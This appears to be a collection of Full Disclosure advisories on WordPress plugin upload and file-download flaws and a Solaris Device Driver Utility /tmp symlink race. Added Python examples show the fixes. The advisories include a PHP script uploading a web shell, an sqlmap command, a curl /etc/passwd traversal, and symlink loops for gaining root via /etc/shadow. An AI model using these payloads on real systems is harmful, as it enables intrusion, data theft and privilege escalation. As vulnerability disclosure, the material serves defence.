*/

$target_url = 'http://www.vapidlabs.com/wp-content/plugins/wp-powerplaygallery/upload.php';
$file_name_with_full_path = '/var/www/shell.php';

echo "POST to $target_url $file_name_with_full_path";
$post = array('albumid'=>'foo' , 'name' => 'shell.php','file'=>'@'.$file_name_with_full_path);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,$target_url);
curl_setopt($ch, CURLOPT_POST,1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
$result=curl_exec ($ch);
curl_close ($ch);
echo "";
echo $result;
echo "";
?>
SQLi PoC:
$ sqlmap -u http://www.vapidlabs.com/wp-content/plugins/wp-powerplaygallery/upload.php --data "albumid=1" --dbms mysql


[FD] Remote file download vulnerability in Wordpress Plugin image-export v1.1

2015-07-13 Thread Larry W. Cashdollar
Title: Remote file download vulnerability in Wordpress Plugin image-export v1.1
Author: Larry W. Cashdollar, @_larry0
Date: 2015-07-01
Download Site: https://wordpress.org/plugins/image-export
Vendor: www.1efthander.com
Vendor Notified: 2015-07-05
Vendor Contact: https://twitter.com/1eftHander
Description: Image Export plugin can help you selectively download images 
uploaded by an administrator.
Vulnerability:
The code in file download.php doesn't do any checking that the user is 
requesting files from the uploaded images directory only. And line 8 attempts to 
unlink the file after being downloaded. This script could be used to delete 
files out of the wordpress directory if file permissions allow.
 
CVEID: TBD
Exploit Code:
$ curl http://example.com/wp-content/plugins/image-export/download.php?file=/etc/passwd
Screen Shots:
Advisory: http://www.vapid.dhs.org/advisory.php?v=135

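The three download.php handlers above (MDC YouTube Downloader, wp-swimteam and image-export) share one missing step: the `file` parameter is never confined to the directory the plugin is meant to serve. The following is an added example, not code from any of these plugins, written in Python since the page mixes PHP, ksh and Python; the exports directory, its files and the planted symlink are constructed stand-ins for a wp-content/uploads tree:

```python
import os
import tempfile

# Added example, not code from any of the plugins above. The download.php
# handlers hand $_GET['file'] straight to fopen()/readfile(); this is the
# containment check they lack.


class ForbiddenPath(Exception):
    """The requested file is not a regular file inside the allowed directory."""


def resolve_download(base_dir, requested):
    """Map the untrusted `file` parameter to a path inside `base_dir` or refuse.

    realpath() is applied before the check, so "../" segments and symlinks
    that point out of the directory are caught; a leading "/" is stripped so
    an absolute request such as /etc/passwd cannot replace the base.
    """
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, requested.lstrip("/\\")))
    # commonpath() rather than startswith(): "/srv/exports-old" must not
    # pass for a base of "/srv/exports".
    if os.path.commonpath([base, candidate]) != base:
        raise ForbiddenPath(requested)
    if not os.path.isfile(candidate):
        raise ForbiddenPath(requested)
    return candidate


def demo():
    """Exercise the check on a constructed directory tree (stands in for
    wp-content/uploads with a symlink planted inside it)."""
    root = tempfile.mkdtemp()
    exports = os.path.join(root, "exports")
    os.mkdir(exports)
    with open(os.path.join(exports, "report.csv"), "w") as fh:
        fh.write("swimmer,time\n")
    with open(os.path.join(root, "wp-config.php"), "w") as fh:
        fh.write("<?php // database credentials live here\n")
    os.symlink(os.path.join(root, "wp-config.php"), os.path.join(exports, "escape"))
    results = {}
    for name in ("report.csv", "../wp-config.php", "/etc/passwd", "escape"):
        try:
            resolve_download(exports, name)
            results[name] = "allowed"
        except ForbiddenPath:
            results[name] = "forbidden"
    return results
```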

[FD] Remote file upload vulnerability in Wordpress Plugin Mobile App Native 3.0

2017-03-02 Thread Larry W. Cashdollar
Title: Remote file upload vulnerability in Wordpress Plugin Mobile App Native 
3.0
Vulnerability Date: 2017-02-27
Download: https://wordpress.org/plugins/zen-mobile-app-native/
Vendor: https://profiles.wordpress.org/zendkmobileapp/
Notified: 2017-02-27
Description: Mobile App WordPress plugin lets you turn your website into a 
full-featured mobile application in minutes using Mobile App Builder.
Vulnerability: The code in file ./zen-mobile-app-native/server/images.php 
doesn't require authentication or check that the user is allowed to upload 
content.
It also doesn't sanitize the file upload against executable code.

http://example.com/wordpress/wp-content/plugins/zen-mobile-app-native/server/images.php
http://example.com/wordpress/wp-content/plugins/zen-mobile-app-native//server/images/8d5e957f297893487bd98fa830fa6413.php

https://github.com/lcashdol/Exploits/blob/master/mobile_plugin_exploit.sh

URL: http://www.vapidlabs.com/advisory.php?v=178
Credit: Larry W. Cashdollar, @_larry0

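For the upload handlers in the wp-powerplaygallery and Mobile App Native posts above, the fix beyond requiring authentication is to stop trusting the client's file name and content. Added example, not either plugin's code: the allow-list, magic bytes and sample inputs are constructed for illustration, and the capability function named in the comment is WordPress's own current_user_can():

```python
import os
import secrets

# Added example, not code from either plugin. It covers only the content and
# naming checks; the missing authentication check (in WordPress, a capability
# test such as current_user_can('upload_files') before doing anything) is the
# other half of the fix and is out of this snippet's scope.

# Extensions a gallery actually needs, each with the bytes a genuine file of
# that type starts with. Executable extensions are simply not listed.
ALLOWED = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}


class RejectedUpload(Exception):
    pass


def validate_upload(client_name, data):
    """Return the extension to store under, or raise RejectedUpload.

    `client_name` is the untrusted $_FILES['file']['name']; `data` is the
    body that would otherwise be written straight to disk.
    """
    name = os.path.basename(client_name.replace("\\", "/"))   # drop any directory part
    ext = name.rsplit(".", 1)[1].lower() if "." in name else ""
    if ext not in ALLOWED:
        raise RejectedUpload("extension %r not allowed" % ext)
    if not any(data.startswith(magic) for magic in ALLOWED[ext]):
        raise RejectedUpload("content is not a %s file" % ext)
    if b"<?php" in data.lower():   # an image never needs a PHP open tag; reject polyglots
        raise RejectedUpload("embedded script tag")
    return ext


def stored_name(ext):
    """Server-chosen file name: the client controls neither path nor extension."""
    return "%s.%s" % (secrets.token_hex(16), ext)


def check(client_name, data):
    """Convenience wrapper returning 'ok:<ext>' or 'rejected' (constructed inputs)."""
    try:
        return "ok:" + validate_upload(client_name, data)
    except RejectedUpload:
        return "rejected"
```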


[FD] Insecure /tmp file use in Oracle Solaris 11 Device Driver Utility v1.3.1 leads to root

2020-07-14 Thread Larry W. Cashdollar via Fulldisclosure
Title: Insecure /tmp file use in Oracle Solaris 11 Device Driver Utility v1.3.1 
leads to root

Author: Larry W. Cashdollar, @_larry0

Date: 2020-02-02

CVE-2020-14724

Download Site: https://docs.oracle.com/cd/E37838_01/html/E69250/useddu.html

Vendor: Oracle, fixed in July 14 2020 CPU 
https://www.oracle.com/security-alerts/cpujul2020.html.

Vendor Notified: 2020-02-02

Vendor Contact: secalert...@oracle.com

Advisory: http://www.vapidlabs.com/advisory.php?v=212

Description: "The Device Driver Utility provides information about the devices 
on your installed system and the drivers that manage those devices. The DDU 
reports whether the currently booted operating system has drivers for all of 
the devices that are detected in your system. If a device does not have a 
driver attached, the Device Driver Utility recommends a driver package to 
install."

Vulnerability:

Append contents of ddu_log to system files via symlink attack: 

In ./ddu-text/utils/ddu-text.py 

18 LOG_LOCATION = "/tmp/ddu_log"

45: print _("Exiting Text Installer. Log is available at:\n%s") % LOG_LOCATION 

50: logging.basicConfig(filename=LOG_LOCATION, level=LOG_LEVEL, 

Elevation of privileges via symlink attack due to chmod operation on /tmp 
file: 

In file ./ddu-text/utils/inner_window.py 

667: logfile = open('/tmp/ddu_err.log', 'a') 

695: logfile = open('/tmp/ddu_err.log', 'a') 

721: logfile = open('/tmp/ddu_err.log', 'a') 

748: logfile = open('/tmp/ddu_err.log', 'a') 

In file ./scripts/comp_lookup.sh 

33:typeset err_log=/tmp/ddu_err.log 

In file ./scripts/det_info.sh 

38:typeset err_log=/tmp/ddu_err.log 

In file ./scripts/pkg_relate.sh 

449:typeset err_log=/tmp/ddu_err.log 

In file ./scripts/find_media.sh 

20:typeset err_log=/tmp/ddu_err.log 

There is a race condition here between file creation and chmod 666 where a 
local user can run a simple script to ensure the symlink exists after the 
ddu_err.log file is removed: 

In file ./scripts/probe.sh 569: 

# Make /tmp/ddu_err.log writable for every user 

571: if [ -f /tmp/ddu_err.log ]; then 

572: pfexec chmod 666 /tmp/ddu_err.log 

574: touch /tmp/ddu_err.log; chmod 666 /tmp/ddu_err.log 

636:typeset err_log=/tmp/ddu_err.log 

These are also potential file clobbering issues: From probe.sh 

131: NIC_info_file=/tmp/dvt_network_info_file 

133: temp_file=/tmp/dvt_network_temp 

134: temp_file_2=/tmp/dvt_network_temp_2 

207: c_file=/tmp/str_ctrl_file 

208: c_file1=/tmp/str_ctrl_file_1 

209: c_file2=/tmp/str_ctrl_file_2 

210: c_file3=/tmp/str_ctrl_file_3 

211: c_file4=/tmp/str_ctrl_file_4 

212: c_file5=/tmp/str_ctrl_file_5 

328: dvt_cd_dev_tmpfile=/tmp/dvt_cd_dev_tmpfile 

329: dvt_cd_ctl_tmpfile=/tmp/dvt_cd_ctl_tmpfile 

330: dvt_cd_ctl_tmpfile1=/tmp/dvt_cd_ctl_tmpfile1 

398: temp_file1=/tmp/dvt_tmp_file1 

399: temp_file2=/tmp/dvt_tmp_file2 

462: cpu_tmpfile=/tmp/cpu_tmpfile 

490: memory_tmpfile=/tmp/memory_tmpfile 

624:typeset ctl_file=/tmp/dvt_ctl_file

 

Exploit Code:

Tested on Solaris 11 x86

larry@SolSun:~$ uname -a
SunOS SolSun 5.11 11.4.0.15.0 i86pc i386 i86pc

and

Open Indiana 

root@openindiana:/export/home/larry# uname -a
SunOS openindiana 5.11 illumos-1b500975aa i86pc i386 i86pc

Append content to /etc/passwd

larry@openindiana:/tmp$ ln -s /etc/passwd ddu_log

To get local root simply have ddu chmod 666 /etc/shadow

larry@openindiana:/tmp$ while true; do ln -s /etc/shadow ddu_err.log; done

A better exploit:

https://github.com/lcashdol/Exploits/tree/master/ddu-exploit

Patches to OpenIndiana

https://github.com/OpenIndiana/ddu/commit/31dca7f6bee738980ecabefadedd01fcc3f3acf6

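The race the advisory describes is between checking for /tmp/ddu_err.log and writing to it by name; a symlink planted by any local user in that window is followed. Added example (not DDU code), in Python to match ddu-text.py, showing the open(path, 'a') behaviour beside an open that refuses pre-existing entries and symlinks; the scratch directory and passwd file are constructed stand-ins for /tmp and /etc/passwd:

```python
import os
import stat
import tempfile

# Added example, not DDU code. The scripts above open /tmp/ddu_log and
# /tmp/ddu_err.log by fixed name with open(path, 'a') and chmod 666 them,
# so whatever a local user has planted at that name is followed.

def naive_append(path, text):
    """What the utility does: append through whatever `path` currently is."""
    with open(path, "a") as fh:
        fh.write(text)

def open_log_securely(path):
    """Create `path` only if no directory entry (file or symlink) exists there.
    O_CREAT|O_EXCL fails with EEXIST if anything is already present, a symlink
    included, whatever it points at; O_NOFOLLOW (where available) also refuses
    to traverse a symlink in the race window. fstat() then confirms the open
    descriptor is a private regular file we own.
    """
    flags = os.O_WRONLY | os.O_APPEND | os.O_CREAT | os.O_EXCL | getattr(os, "O_NOFOLLOW", 0)
    fd = os.open(path, flags, 0o600)
    st = os.fstat(fd)
    if not stat.S_ISREG(st.st_mode) or st.st_uid != os.geteuid() or st.st_nlink != 1:
        os.close(fd)
        raise OSError("refusing to log to %s: not a private regular file" % path)
    return os.fdopen(fd, "a")

def demo():
    """Plant a symlink as the ln -s above does (scratch dir stands in for /tmp and /etc)."""
    root = tempfile.mkdtemp()
    target = os.path.join(root, "passwd")      # stands in for /etc/passwd
    with open(target, "w") as fh:
        fh.write("root:x:0:0::/root:/bin/sh\n")
    link = os.path.join(root, "ddu_log")       # stands in for /tmp/ddu_log
    os.symlink(target, link)
    naive_append(link, "injected line\n")      # lands in `target` via the link
    refused = False
    try:
        open_log_securely(link)
    except FileExistsError:
        refused = True
    with open(target) as fh:
        lines = fh.read().count("\n")          # 2: only the naive write landed
    # The full fix is a private, unpredictably named directory (mkdtemp makes
    # it mode 0700) rather than any fixed name in /tmp.
    with open_log_securely(os.path.join(tempfile.mkdtemp(prefix="ddu-"), "ddu_log")) as fh:
        fh.write("started\n")
    return {"target_lines": lines, "secure_refused": refused}
```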